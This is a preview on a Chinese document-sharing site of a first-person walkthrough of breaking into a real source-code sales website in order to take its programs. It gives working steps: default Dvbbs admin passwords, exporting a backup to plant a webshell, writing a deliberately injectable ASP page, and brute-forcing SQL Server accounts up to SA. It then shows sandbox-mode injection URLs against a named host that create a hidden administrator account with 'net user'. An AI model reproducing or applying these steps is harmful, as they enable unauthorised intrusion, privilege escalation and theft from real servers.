艰难渗透源码销售站点_第1页
艰难渗透源码销售站点_第2页
艰难渗透源码销售站点_第3页
艰难渗透源码销售站点_第4页
艰难渗透源码销售站点_第5页
免费预览已结束,剩余7页可下载查看

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、艰难渗透源码销售站点题外话:最近想做几个垃圾站玩玩。可手上又没有啥好程序。郁闷。那些网上免费的程序又没多少好玩意。百度看看网上谁卖程序。方便的话,搞几个下来玩玩好了。一:小碰头:百度上找了一会, 看到这个站上有几个我喜欢的程序。咋办?试试看吧。当时一看这站,哪像个出售源码程序的站。这么丑。用的啥系统我想大家不说我说也知道了吧。当然,人家手上既然有这么多源码,想必也是通过自己的入侵手段搞来的。那他的主站也根本上就不需要看了。随便在一个url上添加个单引号出现了这个。加了防注入了.算了。不错主站入手了。拿出我们最喜欢的东西吧。()查到同一效劳器上有这些站。有53个站。心里开心了。旁注有望啊。从主站

2、也得知这些网站都是网站管理员的出售中的程序。所以给他们分配的也都是2级域名。大家会想了。2级域名?会不会如果直接搞定一个webshell,就可以得到所有程序呢?因为他们这些演示站点或许会是在主站的下级目录吧。当初我也这么想的。先不说这个了。下面我们开始吧。我首先瞄准了大家看到了什么?对,论坛。而且是动网7.1的。不是吧?这么简单就可以搞到一个webshell了?还卖源码呢.唉。动网默认的密码就进去了。咱们登陆后台拿webshell吧。Dvbbs7.1首先考虑后台导出模板然后备份拿webshell.然后就导出了。问题也就来了。去看看备份数据库那里能否备份。是可以备份的。导出模板不可以。上传文件总

3、还是会允许的吧?结果无论我上传什么类型的文件。无论我怎么伪造文件。都显示这个。难怪管理员会这么放心的把密码设为默认的。我想大概是方便购置的人查看吧。想了想。要是这样的话?那不会所有的2级网站都是这样吧?我是个不服输的人。大不了一个一个试。不就53个网站么?经历了“无数的数据库只读,无写入权限等问题。几乎所有的2级都是这样。看来管理员还是挺有意识。为难了。怎么办?不会就这么放弃吧。二:峰回路转。我没有放弃。接着又找到一动网7.1默认密码。 : 哈哈。百密终有一疏啊。这么多的站。总算还有一个没把权限给卡住啊。成功导出后。然后通过备份拿到一个webshell.终于叹了口气。搞了大半天终于拿到了一个w

4、ebshell.提权吧。无ws无任何第3方可以直接利用软件。Aspx的马马运行不了(其实效劳器是支持.net的)。跳转的d:/web/ 跳转不了唉。提权无望啊。又不知道其他目录的名称。社工了好几个,都不能跳转。想了想,同级目录会不会允许跳转呢?带着侥幸的心理尝试了下。大家会说了,根本就不知道其他的网站目录其实要想知道一个同级目录也不难。刚刚咱们不是还有个动网默认密码的没搞下来么?大家有没想到什么?动网后台在数据处理的系统信息检测可以看到网站的路径的。呵呵。对了。(其实还有的其他几个站点可以通过aspcheck.asp来得知的。)哈哈。跳转成功。但也就只能跳这个三级目录。不过不要紧。舒服的东西在

5、下面呢。习惯性的看了下数据库连接文件。strconn = "driver=sql server;server=(local);uid=xxx;pwd=xxx;database=xxx"呵呵。是个SQL的数据库。试试是否可以上传文件到这个站。唉。权限还是不够啊。那就用SQLtool直接连接吧。我晕。怎么可能呢?密码难道错误?不会啊。重新找了一下数据库连接我文件。也就那么一个。那到底怎么回事呢?很明显,禁止了外部连接1433端口。如果是这样的话那好办。传个SQLrootkit就可以了。事实证明了这一点。我用webshell自带的SQL连接工具连接了。在我意料之中。这仅仅是个db

6、权限的数据库而已。Db权限的数据库?大家想到了什么?呵呵。对了。Db 权限的注入点可以列目录啊。既然效劳器允许我们跳转到3级目录(这只是暂时的猜测,因为毕竟暂时只有一个3级目录被我们跳转了)。XP_CMDSHELL. 存在!SP_OACREATE. 存在!XP_REGWRITE. 存在!XP_SERVICECONTROL 存在!经查询。这些都还在。那就好办了。直接构造注入点吧。<!-#include file="xx.asp"-><%set rs=server.createobject("ADODB.recordset")id = re

7、quest("id")strSQL ="select * from admin where id="& id rs.open strSQL,conn,1,3rs.close%>这里的admin必须是一个存在的表名。我们可以通过SQL连接工具执行SQL命令查询。select name from sysobjects where type='U'查询出我们需要的表名。或者我也在 ./conn/encode.asp这个文件里找到这一句。sql="select count (*) from login where id=&

8、quot;&cint(myid)很明显。这里的login就可以被我们用上。strSQL = "select * from login where id=" & id 我们构造出这样的语句替换到上面的代码中。至此。终于有了突破。成功构造了注入点。呵呵。能够列出目录了。我们现在会想。要想搞到3389的终极权限。现在只能靠1433这个口子了。既然效劳器支持我们跳转到某些目录。那咱们一一试过去不就行了。事情证明。找1433实在是太辛苦了。有的人大概会一个目录一个目录的去找吧。但有的网站只是access的。其实这也是我当初的做法。后来兄弟可酷可乐告诉我。直接列出这个目

9、录d:Program FilesMicrosoft SQL ServerMSSQLData数据库的前缀根本上是有规律的。那就是跟二级域名很相似。直接去找那些目录就可以了。这样就可以省下很多事。找到目录后,一一的在webshell上跳转。很顺利。在通过几次观察后。管理员把SQL帐户设置的很有规律。aaa1 aaa2 aaa3 aaa4 aaa5 而密码有都是一样的。我这个人就是懒,喜欢偷懒。那这些用户中会否有一个是SA的权限呢?赶紧去一个一个试。我从aaa1试到aaa16。呵呵。恭喜!SQL SERVER最高权限。还等什么?赶紧net user 吧。xpsql.cpp: 错误 5 来自 Crea

10、teProcess第 737 行郁闷了。出现了这样的情况。没有足够的权限创立进程。难道不是SA权限? SA都被降权了?c:windowssystem32cmd.exe没有被删啊那怎么办?想要用SQL查询分析器连接吧,但1433又不对外开放。外部不可以连接。想把效劳器上的1433端口转发到本地吧。又无ws.网上查了查资料。用沙盒模式提权来试下再来构造个个SA的注入点。这不难。继续构造。再次执行select name from sysobjects where type='U'查询myadmin这个数据库中的表名。好了。成功构造出来了。接着就是沙盒模式提权了。 :/haoteach

11、er.200ym /Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWareMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;- :/haoteacher.200ym /Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Data

12、base=c:windowssystem32iasias.mdb','select shell("net user aloner$ aloner /add")');- :/haoteacher.200ym /Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:windowssystem32iasias.mdb','select shell("net localgroup adm

13、inistrators aloner$ /add")');-返回正常。说明成功了。或者用HDSI 执行下面这些SQL命令。EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWareMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:windowssystem32iasias.mdb','select shell("net user aloner aloner /add")');Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:win

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论